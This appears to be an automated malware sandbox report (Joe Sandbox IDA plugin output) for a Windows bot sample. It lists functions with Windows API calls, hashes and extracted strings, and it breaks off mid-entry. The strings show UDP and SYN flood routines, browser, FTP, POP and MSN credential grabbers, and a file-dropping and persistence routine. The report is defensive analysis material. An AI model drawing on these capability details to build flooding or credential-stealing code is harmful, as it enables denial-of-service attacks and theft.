                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Filewcsstr$Attributes$ExitMoveThread
                                                                  • String ID: %s.%S$DBWIN$\\.\pipe$brk$dll$exe$ruskill
                                                                  • API String ID: 294512176-1976196219
                                                                  • Opcode ID: f788c5e29bcaf52ab487673b07dc54bcc2d7b5621d1d5e71b578e585cdede57c
                                                                  • Instruction ID: b187955e1f9bfccfa47cb2fde0fb2d65724cc04978e6b4598bbf58e3d286f999
                                                                  • Opcode Fuzzy Hash: f788c5e29bcaf52ab487673b07dc54bcc2d7b5621d1d5e71b578e585cdede57c
                                                                  • Instruction Fuzzy Hash: 6941257A600605BBE7239F19AC47FEB379CEF18315F19C124FD0896645EB349D40C6A2
                                                                  Function 0036B300 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 129stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0036B312
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0036B319
                                                                  • memset.MSVCRT ref: 0036B339
                                                                  • memset.MSVCRT ref: 0036B354
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0036B387
                                                                  • lstrcpynW.KERNEL32(?,?,00000004), ref: 0036B3A1
                                                                  • GetVolumeInformationW.KERNEL32 ref: 0036B3BB
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036B3D8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036B3F0
                                                                  • lstrcatW.KERNEL32(00000000,.exe), ref: 0036B461
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlenmemset$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpyn
                                                                  • String ID: .exe$30e44aa1$lol$lol.exe
                                                                  • API String ID: 1748614950-52295467
                                                                  • Opcode ID: dfa20457d5faf30ae882ac48d9361a211796fb0d05f551093680df228f35af0d
                                                                  • Instruction ID: 3bdf4ed0ee7b5877157a778ec6b01f1e64a3144198662757e312d8a7c651285f
                                                                  • Opcode Fuzzy Hash: dfa20457d5faf30ae882ac48d9361a211796fb0d05f551093680df228f35af0d
                                                                  • Instruction Fuzzy Hash: 424109B1601214A6C731CB698C45AEFFBBDEF84311F14C1A6F51CD6251E7B88A80DBA5
                                                                  Function 0040AA10 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 157networkstringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040AA31
                                                                  • lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 0040AA45
                                                                  • InternetOpenA.WININET(00000000,?,?,?,?), ref: 0040AA60
                                                                  • lstrlenA.KERNEL32(?), ref: 0040AA78
                                                                  • InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 0040AA8C
                                                                  • HttpQueryInfoA.WININET(?,20000013,?,?,00000000), ref: 0040AAC0
                                                                  • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 0040AAE2
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AB15
                                                                  • InternetReadFile.WININET(00000000,?,00000FF8,00000001), ref: 0040AB67
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AB85
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040ABA5
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040ABE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$??2@OpenQuery$??3@AvailableCloseDataFileHandleHttpInfoReadlstrcpylstrlenmemset
                                                                  • String ID: Mozilla/4.0
                                                                  • API String ID: 2392773942-2634101963
                                                                  • Opcode ID: 4f10962397f0d9271c525f08f7cb6bc530c7be40262e652ad9c0884eaf464376
                                                                  • Instruction ID: a422d9b20280b57269b7f944718ccc37572e3d881d969e5d12542f5013b1ac47
                                                                  • Opcode Fuzzy Hash: 4f10962397f0d9271c525f08f7cb6bc530c7be40262e652ad9c0884eaf464376
                                                                  • Instruction Fuzzy Hash: AA519D75A00205AFD720DF59EC84FAA77F8EB49300F14847EE908E7290D7B4A955CF99
                                                                  Function 0040EE40 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142stringcomCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00413634,00000000,00000001,00413614,?), ref: 0040EE5B
                                                                  • memset.MSVCRT ref: 0040EE81
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040EE9A
                                                                  • lstrcatA.KERNEL32(00000000,00412C78), ref: 0040EEAE
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040EEBB
                                                                  • memset.MSVCRT ref: 0040EED5
                                                                  • SHGetFileInfoA.SHELL32(?,00000000,00000000,00000160,00001000), ref: 0040EEF4
                                                                  • memset.MSVCRT ref: 0040EF68
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040EF7B
                                                                  • lstrcatA.KERNEL32(00000000,.lnk), ref: 0040EF89
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0040EFA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcatmemset$lstrcpy$ByteCharCreateFileInfoInstanceMultiWide
                                                                  • String ID: .lnk$shell32.dll
                                                                  • API String ID: 3196525290-3399515747
                                                                  • Opcode ID: a40b82f81dedbe41e5b5f199d7865c4fa3311a6b57336a6c214b4744f9a9312f
                                                                  • Instruction ID: e73eb6ab999c0e51fafbce32c2bf391fc0f26170288299265a72334d30c84f39
                                                                  • Opcode Fuzzy Hash: a40b82f81dedbe41e5b5f199d7865c4fa3311a6b57336a6c214b4744f9a9312f
                                                                  • Instruction Fuzzy Hash: 3E513375A40208BFDB50DB94CC85FDAB3B9AF8C704F104599F608E7290D7B4AE85CB64
                                                                  Function 00402220 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 132networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402243
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00402257
                                                                    • Part of subcall function 00409300: inet_addr.WS2_32(n"@), ref: 00409308
                                                                    • Part of subcall function 00409300: gethostbyname.WS2_32(n"@), ref: 00409313
                                                                  • htons.WS2_32(00000050), ref: 00402288
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00402297
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 004022AE
                                                                  • GetTickCount.KERNEL32 ref: 004022C3
                                                                  • GetTickCount.KERNEL32 ref: 004022F4
                                                                  • GetTickCount.KERNEL32 ref: 00402307
                                                                  • send.WS2_32(00000000,00000000,00000400,00000000), ref: 00402344
                                                                  • GetTickCount.KERNEL32 ref: 00402350
                                                                  • closesocket.WS2_32(00000000), ref: 00402363
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupclosesocketconnectgethostbynamehtonsinet_addrmemsetsendsocket
                                                                  • String ID: gfff$i.root-servers.org
                                                                  • API String ID: 99835129-3534201491
                                                                  • Opcode ID: f78e395c58b77124e21493b2d3d67db5c73849f44d2ec07c99d54a6843a9ec4a
                                                                  • Instruction ID: 99d350245f41469f9620f1c84c2ac9dacd51c4893e9af8f4a97e645d4d05bf82
                                                                  • Opcode Fuzzy Hash: f78e395c58b77124e21493b2d3d67db5c73849f44d2ec07c99d54a6843a9ec4a
                                                                  • Instruction Fuzzy Hash: 20312872B0031857DB14E67A9D46BEFA2698B85714F04457AFE0CE72C0EAF88D81469A
                                                                  Function 00362220 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 132networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00362243
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00362257
                                                                    • Part of subcall function 00369300: inet_addr.WS2_32(n"6), ref: 00369308
                                                                    • Part of subcall function 00369300: gethostbyname.WS2_32(n"6), ref: 00369313
                                                                  • htons.WS2_32(00000050), ref: 00362288
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00362297
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 003622AE
                                                                  • GetTickCount.KERNEL32 ref: 003622C3
                                                                  • GetTickCount.KERNEL32 ref: 003622F4
                                                                  • GetTickCount.KERNEL32 ref: 00362307
                                                                  • send.WS2_32(00000000,00000000,00000400,00000000), ref: 00362344
                                                                  • GetTickCount.KERNEL32 ref: 00362350
                                                                  • closesocket.WS2_32(00000000), ref: 00362363
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupclosesocketconnectgethostbynamehtonsinet_addrmemsetsendsocket
                                                                  • String ID: gfff$i.root-servers.org
                                                                  • API String ID: 99835129-3534201491
                                                                  • Opcode ID: 41296caac908b04ec27c6eed035764c6a908eaf67deeb2b9fcea845dc3ccd9e0
                                                                  • Instruction ID: 168749357e4ea4c866ba99e5d19f48743618ae037dc388d7cd939bde22e32ba4
                                                                  • Opcode Fuzzy Hash: 41296caac908b04ec27c6eed035764c6a908eaf67deeb2b9fcea845dc3ccd9e0
                                                                  • Instruction Fuzzy Hash: 06318AB2B002085BDB2AD66D9C42BFFB26D8F84700F158525FA0CEB3C4EAB48D0147D2
                                                                  Function 00409830 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 123memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409850
                                                                  • strtok.MSVCRT ref: 0040986E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040988B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 004098A8
                                                                  • strtok.MSVCRT ref: 004098B5
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 004098D1
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040999C
                                                                  Strings
                                                                  • [UDP]: Starting flood on "%s:%d" for %d second(s), xrefs: 0040993A
                                                                  • [UDP]: Finished flood on "%s:%d", xrefs: 00409970
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [UDP]: Finished flood on "%s:%d"$[UDP]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-2644890838
                                                                  • Opcode ID: 54cb3ea3974434cd071d8694b67c6c8d9e1e54e687e6a1fad61b000ba8bb3522
                                                                  • Instruction ID: fbb45061dfc7ed30b2521fa6da11e7ac7608b88c8cddc2238a61025220eaa290
                                                                  • Opcode Fuzzy Hash: 54cb3ea3974434cd071d8694b67c6c8d9e1e54e687e6a1fad61b000ba8bb3522
                                                                  • Instruction Fuzzy Hash: A531DCF26442086BD720A7A1AC46FE7375CDB84709F04417EFF08E12D1D5B99D5087AD
                                                                  Function 004096B0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 123memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004096D0
                                                                  • strtok.MSVCRT ref: 004096EE
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040970B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 00409728
                                                                  • strtok.MSVCRT ref: 00409735
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00409751
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040981C
                                                                  Strings
                                                                  • [SYN]: Starting flood on "%s:%d" for %d second(s), xrefs: 004097BA
                                                                  • [SYN]: Finished flood on "%s:%d", xrefs: 004097F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [SYN]: Finished flood on "%s:%d"$[SYN]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-3475151101
                                                                  • Opcode ID: fb129c0162ccbfb104049f26340d41eef2b7c7d60fa9300f04f63c344587d033
                                                                  • Instruction ID: bdd8c48b6cfbaf6ae2aa7db1173a1b009192250db3acf329e7d18af35a504bf2
                                                                  • Opcode Fuzzy Hash: fb129c0162ccbfb104049f26340d41eef2b7c7d60fa9300f04f63c344587d033
                                                                  • Instruction Fuzzy Hash: B631E9F2A50204ABD720A7A1AC46FE7375CDB45309F14847AFF08A22D2D6B89D5087AD
                                                                  Function 00369830 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 123memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00369850
                                                                  • strtok.MSVCRT ref: 0036986E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036988B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 003698A8
                                                                  • strtok.MSVCRT ref: 003698B5
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003698D1
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036999C
                                                                  Strings
                                                                  • [UDP]: Finished flood on "%s:%d", xrefs: 00369970
                                                                  • [UDP]: Starting flood on "%s:%d" for %d second(s), xrefs: 0036993A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [UDP]: Finished flood on "%s:%d"$[UDP]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-2644890838
                                                                  • Opcode ID: 67748c10eb3aafae285d101781178b5456bd131ca9f8a95a620331c26ac8dd4f
                                                                  • Instruction ID: 2a2517291a79f91d872ffde8c7b64008c259628d3bb94bc4a87f7d068eeb5756
                                                                  • Opcode Fuzzy Hash: 67748c10eb3aafae285d101781178b5456bd131ca9f8a95a620331c26ac8dd4f
                                                                  • Instruction Fuzzy Hash: 393116B3A002086BD732A7A5AC46FBB339CEB45314F04816DFA0CE6145D7B59940C662
                                                                  Function 003696B0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 123memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003696D0
                                                                  • strtok.MSVCRT ref: 003696EE
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036970B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 00369728
                                                                  • strtok.MSVCRT ref: 00369735
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 00369751
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036981C
                                                                  Strings
                                                                  • [SYN]: Finished flood on "%s:%d", xrefs: 003697F0
                                                                  • [SYN]: Starting flood on "%s:%d" for %d second(s), xrefs: 003697BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [SYN]: Finished flood on "%s:%d"$[SYN]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-3475151101
                                                                  • Opcode ID: 5bca53f8a622adcba29b14372bc0fabf784a352e008e4812b52047f7ac8d932d
                                                                  • Instruction ID: f52d8f6bc08120ca277589ea4572c73b0ce59ac4dbb30f38729a648466147f12
                                                                  • Opcode Fuzzy Hash: 5bca53f8a622adcba29b14372bc0fabf784a352e008e4812b52047f7ac8d932d
                                                                  • Instruction Fuzzy Hash: 193109F39002086BE736ABA0AC46FB7335CEB45314F048069FF0CDA185D6B59D44C7A5
                                                                  Function 00410C80 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100memorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 00410C89
                                                                  • GetModuleFileNameA.KERNEL32(00000000,0044AA28,00000104), ref: 00410C9F
                                                                  • GetModuleFileNameW.KERNEL32(00000000,0044A710,00000208), ref: 00410CB0
                                                                  • GetWindowsDirectoryA.KERNEL32(0044AB30,00000104), ref: 00410CC0
                                                                    • Part of subcall function 004019F0: wcsrchr.MSVCRT ref: 004019F9
                                                                  • InitializeCriticalSection.KERNEL32(0044AC34), ref: 00410CE3
                                                                  • InitializeCriticalSection.KERNEL32(0044B4E4), ref: 00410CEA
                                                                  • MoveFileExW.KERNEL32(0044A710,00000000,00000004), ref: 00410DA5
                                                                    • Part of subcall function 0040A150: memset.MSVCRT ref: 0040A170
                                                                    • Part of subcall function 0040A150: GetWindowsDirectoryW.KERNEL32(?,00000208,?,?,?), ref: 0040A184
                                                                    • Part of subcall function 0040A150: _memicmp.MSVCRT ref: 0040A1C3
                                                                  • SetFileAttributesW.KERNEL32(0044A710,00000080), ref: 00410D96
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E9F0,00000000,00000000,00000000), ref: 00410DED
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410DF4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CriticalDirectoryInitializeModuleNameSectionWindows$AttributesCloseCreateHandleHeapMoveProcessThread_memicmpmemsetwcsrchr
                                                                  • String ID: %s.%S$brk$ruskill
                                                                  • API String ID: 2870590860-2269373653
                                                                  • Opcode ID: f3ac461219e4e0abdf8921ca99c1299e94cb7a3db5c5f1741129b7d9564e1414
                                                                  • Instruction ID: 3a2e178202fb7a30b488f4e8e7deeec61a3289b4e305d2c307b23111bd812d03
                                                                  • Opcode Fuzzy Hash: f3ac461219e4e0abdf8921ca99c1299e94cb7a3db5c5f1741129b7d9564e1414
                                                                  • Instruction Fuzzy Hash: E031B471AC0310B7F3306BA1AD0BFCA76A4A709B05F204037FB01A56E1D6FCA0A1865F
                                                                  Function 00370C80 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100memorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32 ref: 00370C89
                                                                  • GetModuleFileNameA.KERNEL32(00000000,003AAA28,00000104), ref: 00370C9F
                                                                  • GetModuleFileNameW.KERNEL32(00000000,003AA710,00000208), ref: 00370CB0
                                                                  • GetWindowsDirectoryA.KERNEL32(003AAB30,00000104), ref: 00370CC0
                                                                    • Part of subcall function 003619F0: wcsrchr.MSVCRT ref: 003619F9
                                                                  • InitializeCriticalSection.KERNEL32(003AAC34), ref: 00370CE3
                                                                  • InitializeCriticalSection.KERNEL32(003AB4E4), ref: 00370CEA
                                                                  • MoveFileExW.KERNEL32(003AA710,00000000,00000004), ref: 00370DA5
                                                                    • Part of subcall function 0036A150: memset.MSVCRT ref: 0036A170
                                                                    • Part of subcall function 0036A150: GetWindowsDirectoryW.KERNEL32(?,00000208,?,?,?), ref: 0036A184
                                                                    • Part of subcall function 0036A150: _memicmp.MSVCRT ref: 0036A1C3
                                                                  • SetFileAttributesW.KERNEL32(003AA710,00000080), ref: 00370D96
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E9F0,00000000,00000000,00000000), ref: 00370DED
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00370DF4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CriticalDirectoryInitializeModuleNameSectionWindows$AttributesCloseCreateHandleHeapMoveProcessThread_memicmpmemsetwcsrchr
                                                                  • String ID: %s.%S$brk$ruskill
                                                                  • API String ID: 2870590860-2269373653
                                                                  • Opcode ID: d3d4774cd5fe6536c05857de092ead06c58ce774df08f44a19b5e9d4c099d2f2
                                                                  • Instruction ID: 8d229ad3e332f3e05943fb172163844475a3f158018546aa31944a6293b0faec
                                                                  • Opcode Fuzzy Hash: d3d4774cd5fe6536c05857de092ead06c58ce774df08f44a19b5e9d4c099d2f2
                                                                  • Instruction Fuzzy Hash: E431C7776C0700FBE63357E46C07FAA37E8EB06B45F008020F649A91E2DBA56051CA67
                                                                  Function 0040A880 Relevance: 22.6, APIs: 2, Strings: 13, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040A89E
                                                                    • Part of subcall function 00407790: memset.MSVCRT ref: 004077AE
                                                                    • Part of subcall function 00407790: memset.MSVCRT ref: 004077C8
                                                                    • Part of subcall function 00407790: lstrcpyA.KERNEL32(00000000,off), ref: 004077F0
                                                                    • Part of subcall function 00407790: _snprintf.MSVCRT ref: 0040780D
                                                                    • Part of subcall function 00407790: lstrlenA.KERNEL32(00000000), ref: 00407822
                                                                    • Part of subcall function 00407790: lstrlenA.KERNEL32(00000000), ref: 00407858
                                                                  • _snprintf.MSVCRT ref: 0040A936
                                                                    • Part of subcall function 00407500: lstrlenA.KERNEL32(?), ref: 0040752B
                                                                    • Part of subcall function 00407500: _snprintf.MSVCRT ref: 00407547
                                                                    • Part of subcall function 00407500: _vsnprintf.MSVCRT ref: 00407569
                                                                    • Part of subcall function 00407500: lstrcmpA.KERNEL32(?,bdns), ref: 0040758B
                                                                    • Part of subcall function 00407500: StrStrIA.SHLWAPI(?,00000000), ref: 0040759F
                                                                    • Part of subcall function 00407500: lstrlenA.KERNEL32(?), ref: 004075B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintfmemset$_vsnprintflstrcmplstrcpy
                                                                  • String ID: bdns$ffgrab$ftpgrab$http$httpi$iegrab$int$msg$msn$msnu$pdef$popgrab$usbi
                                                                  • API String ID: 3955240783-2907616027
                                                                  • Opcode ID: 699ddea0ae8c647cc20d7a969bd25affe5c253e482046ec1477590fe2f3617ef
                                                                  • Instruction ID: 457c04c965f4f402ec546b575a89d7806f30f9b4e57064c7f721fde9d0d55c32
                                                                  • Opcode Fuzzy Hash: 699ddea0ae8c647cc20d7a969bd25affe5c253e482046ec1477590fe2f3617ef
                                                                  • Instruction Fuzzy Hash: 3211CC74FE930675E660BBA25D83FD962254B40F48F20046B7618BA0D799FD35D0826F
                                                                  Function 0036A880 Relevance: 22.6, APIs: 2, Strings: 13, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036A89E
                                                                    • Part of subcall function 00367790: memset.MSVCRT ref: 003677AE
                                                                    • Part of subcall function 00367790: memset.MSVCRT ref: 003677C8
                                                                    • Part of subcall function 00367790: lstrcpyA.KERNEL32(00000000,off), ref: 003677F0
                                                                    • Part of subcall function 00367790: _snprintf.MSVCRT ref: 0036780D
                                                                    • Part of subcall function 00367790: lstrlenA.KERNEL32(00000000), ref: 00367822
                                                                    • Part of subcall function 00367790: lstrlenA.KERNEL32(00000000), ref: 00367858
                                                                  • _snprintf.MSVCRT ref: 0036A936
                                                                    • Part of subcall function 00367500: lstrlenA.KERNEL32(?), ref: 0036752B
                                                                    • Part of subcall function 00367500: _snprintf.MSVCRT ref: 00367547
                                                                    • Part of subcall function 00367500: _vsnprintf.MSVCRT ref: 00367569
                                                                    • Part of subcall function 00367500: lstrcmpA.KERNEL32(?,bdns), ref: 0036758B
                                                                    • Part of subcall function 00367500: StrStrIA.SHLWAPI(?,00000000), ref: 0036759F
                                                                    • Part of subcall function 00367500: lstrlenA.KERNEL32(?), ref: 003675B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintfmemset$_vsnprintflstrcmplstrcpy
                                                                  • String ID: bdns$ffgrab$ftpgrab$http$httpi$iegrab$int$msg$msn$msnu$pdef$popgrab$usbi
                                                                  • API String ID: 3955240783-2907616027
                                                                  • Opcode ID: 11d1262e98bdbd6567669483a9e7cbc78ea7c2849cd61c67483422eae3c20273
                                                                  • Instruction ID: 357a8f2956e236ce0aaf1df97ffae4238040f398d631fa3367d96cd1f0ce76a7
                                                                  • Opcode Fuzzy Hash: 11d1262e98bdbd6567669483a9e7cbc78ea7c2849cd61c67483422eae3c20273
                                                                  • Instruction Fuzzy Hash: CF115275BF930A75FA77B6A44CC3FEA22594B40F08F40C094F20DBD0C6A9E925408266
                                                                  Function 004017E0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040180E
                                                                  • memset.MSVCRT ref: 00401829
                                                                  • wcsstr.MSVCRT ref: 00401842
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 00401888
                                                                  • strstr.MSVCRT ref: 00401898
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000208), ref: 004018B7
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 00401905
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidememset$lstrcmpstrstrwcsstr
                                                                  • String ID: %s.%S$bdns$block$brk$rdns
                                                                  • API String ID: 695720605-4000218262
                                                                  • Opcode ID: 9e954df8ccb3bb30851bf74f7e6fcbbb0a11fed6d0820c81aa3748fd1c2c191f
                                                                  • Instruction ID: 328a3583c6fef178050e9a0b2bf86a627fd064549297ff0a8097fc8f98231c6a
                                                                  • Opcode Fuzzy Hash: 9e954df8ccb3bb30851bf74f7e6fcbbb0a11fed6d0820c81aa3748fd1c2c191f
                                                                  • Instruction Fuzzy Hash: F9511CB1A0020877EB20EB55DC46FDB77689B45715F10413BFD14B22E1D7B8DA84C7AA
                                                                  Function 003617E0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036180E
                                                                  • memset.MSVCRT ref: 00361829
                                                                  • wcsstr.MSVCRT ref: 00361842
                                                                  • lstrcmpA.KERNEL32(00000000,block), ref: 00361888
                                                                  • strstr.MSVCRT ref: 00361898
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000208), ref: 003618B7
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000104,00000000,00000000), ref: 00361905
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
